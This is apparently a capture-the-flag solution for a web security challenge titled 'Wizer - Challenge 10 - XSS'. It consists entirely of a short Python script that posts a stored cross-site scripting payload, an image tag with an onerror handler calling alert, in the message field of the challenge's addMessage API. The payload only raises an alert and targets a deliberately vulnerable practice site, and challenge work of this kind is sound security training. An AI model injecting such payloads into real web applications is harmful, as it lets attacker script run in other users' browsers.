Wizer - Challenge 10 - XSS

Exploit

import requests

url = "https://chal10.vercel.app/api/addMessage"

r = requests.post(
    url,
    json=[
        {"name": "firstName", "value": "pelele"},
        {"name": "lastName", "value": "pelele"},
        {"name": "message", "value": "<img src=x onerror=alert('Wizer')>"},
    ],
)


print(r.text)